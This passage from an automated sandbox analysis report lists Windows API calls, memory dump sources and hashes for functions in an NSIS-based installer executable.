                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401EF8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Times New Roman
                                                        • API String ID: 3808545654-927190056
                                                        • Opcode ID: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                        • Instruction ID: e238c2cdee3483520897b3d1e8694375d24364cfb31141c1d88cf39a281bb876
                                                        • Opcode Fuzzy Hash: e7871214ef899597a5c21e8ed64a158595def24cf366e312614ef02057251c7c
                                                        • Instruction Fuzzy Hash: 9D018871904250EFE7005BB4EE99BDD3FB4AF55301F20897AF142B61E2C6B904459BED
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                        • wsprintfW.USER32 ref: 0040300A
                                                        • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 1451636040-1158693248
                                                        • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                        • Instruction ID: bec97a1ff423586d6a5c987b60c5c02bd53578e49ae90ce5674df69195bed5dc
                                                        • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                        • Instruction Fuzzy Hash: 98F0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AF646B51D0DBB99A558F99
                                                        APIs
                                                          • Part of subcall function 738B12BB: GlobalAlloc.KERNEL32(00000040,?,738B12DB,?,738B137F,00000019,738B11CA,-000000A0), ref: 738B12C5
                                                        • GlobalFree.KERNEL32(?), ref: 738B2743
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B2778
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 39f257310991ac7208d3eafe3289a8b0ad4e591fe15fcc59aa08ff4f4960558f
                                                        • Instruction ID: 8fbeaabaa39867d28f03bd3af361ad0bca53f3b6258712649015344b2a7b0c84
                                                        • Opcode Fuzzy Hash: 39f257310991ac7208d3eafe3289a8b0ad4e591fe15fcc59aa08ff4f4960558f
                                                        • Instruction Fuzzy Hash: 1331BE7220458BEFD7169FE5C985E2E77BBEB863003284529F20587360E7386806CB69
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                        • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                        • Instruction ID: 349357d0e6511a5e46fd8e19636faeb724d9b15f10a4c99f70335ec2520be7da
                                                        • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                        • Instruction Fuzzy Hash: 2731B171D00124BBCF21AFA5DD89D9E7E79AF44364F14023AF415762E1CB794D418F68
                                                        APIs
                                                        • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                        • wsprintfW.USER32 ref: 00404F78
                                                        • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$H/B
                                                        • API String ID: 3540041739-2222257793
                                                        • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                        • Instruction ID: d50fdcff321319429c488fc01686433ffa638a32cb0890ada2b0e386a1fa8516
                                                        • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                        • Instruction Fuzzy Hash: 8B11A873A0412837DB00656D9D45E9E369C9B85374F154637FA26F31D1E979CC2182E8
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: FreeGlobal
                                                        • String ID:
                                                        • API String ID: 2979337801-0
                                                        • Opcode ID: 4f6ac9e717d656c39296c262a7dcd0087afcf39744ebbf248f79546b000b1691
                                                        • Instruction ID: af0b308ab6a429b939e108590a65c7a599196fa45d3c0d75769add7844503b3c
                                                        • Opcode Fuzzy Hash: 4f6ac9e717d656c39296c262a7dcd0087afcf39744ebbf248f79546b000b1691
                                                        • Instruction Fuzzy Hash: AD51C132D0011BEBDB029FE8848179EBBBBEB44300F58815AD506AF394F67DBA45C791
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B25C2
                                                          • Part of subcall function 738B12CC: lstrcpynW.KERNEL32(00000000,?,738B137F,00000019,738B11CA,-000000A0), ref: 738B12DC
                                                        • GlobalAlloc.KERNEL32(00000040), ref: 738B2548
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 738B2563
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                        • String ID:
                                                        • API String ID: 4216380887-0
                                                        • Opcode ID: f84995d11a83ae7e3db1b534298e49da116afc122270742e2e78768b80313ff7
                                                        • Instruction ID: 183d191d2e1db1552f991b617d7f9bb49a84dda56428db468c2b87afadf19d3b
                                                        • Opcode Fuzzy Hash: f84995d11a83ae7e3db1b534298e49da116afc122270742e2e78768b80313ff7
                                                        • Instruction Fuzzy Hash: C341DFB100478FDFD764EFA4D840B2677BAFB88310F148A1DE54A8B781E738A645CB61
                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                        • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                        • Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
                                                        • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                        • GetClientRect.USER32(?,?), ref: 00401E0A
                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                        • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                        • Instruction ID: 9dfadece7afb1d036d9df0696a088785edc369755c046bee68b18a74b307b48a
                                                        • Opcode Fuzzy Hash: bd4e520b8cc5a1f7d7462dde4cdf2bafadf22cf4d53fc2066ec95edb4c3fdfff
                                                        • Instruction Fuzzy Hash: DC213B72900119AFCF05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,738B22D8,?,00000808), ref: 738B16D5
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,738B22D8,?,00000808), ref: 738B16DC
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,738B22D8,?,00000808), ref: 738B16F0
                                                        • GetProcAddress.KERNEL32(738B22D8,00000000), ref: 738B16F7
                                                        • GlobalFree.KERNEL32(00000000), ref: 738B1700
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3172815841.00000000738B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3172732409.00000000738B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173096944.00000000738B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.3173194995.00000000738B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_738b0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                        • String ID:
                                                        • API String ID: 1148316912-0
                                                        • Opcode ID: 9f04f03a5eb3457f896429372c6cd67b4d29834b9d56e1755df91aa9a4c4867a
                                                        • Instruction ID: 802be6ea98b8a0911ea46a872678d8866c8aded2fa60b0f9e9906f4132d193b9
                                                        • Opcode Fuzzy Hash: 9f04f03a5eb3457f896429372c6cd67b4d29834b9d56e1755df91aa9a4c4867a
                                                        • Instruction Fuzzy Hash: D6F01C732065397BD62026A79C4DDABBF9CEF8B2F5B250215F62C922A096714C02D7F1
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                        • Instruction ID: 990765c93fade27e2bb35c4ad61bbd9c2d50a24465aba9d794b4eebee5297a47
                                                        • Opcode Fuzzy Hash: 7ad168aabce29fd4aea1c4775643c0a159d1592a8197a50a1d283e8c160106aa
                                                        • Instruction Fuzzy Hash: 30217E7191421AAEEB05AFA4D94AAFE7BB0EF44304F10453EF505B61D0D7B88941DB98
                                                        APIs
                                                          • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                          • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 0040602A
                                                          • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                          • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 004060D2
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0), ref: 004060E2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: 4#v.#v$C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp
                                                        • API String ID: 3248276644-3930606535
                                                        • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                        • Instruction ID: 57cdea5284265d05e194d97f438d60f20e9a33b3e1b8f85ab2b18f32e1c9dba5
                                                        • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                        • Instruction Fuzzy Hash: F6F04425184A6259E622B73A0C05AAF25098F82324B4B463FF803B22C1DF3D8963917E
                                                        APIs
                                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp,C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 0040602A
                                                        • CharNextW.USER32(00000000), ref: 0040602F
                                                        • CharNextW.USER32(00000000), ref: 00406047
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp, xrefs: 0040601D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3135385522.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3135366938.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135406473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135422638.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3135552322.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp
                                                        • API String ID: 3213498283-1944480652
                                                        • Opcode ID: fbda1c126528e77f8eb1d19cbf263a4f79599cb979c26f3e0093e3aefe43dd94
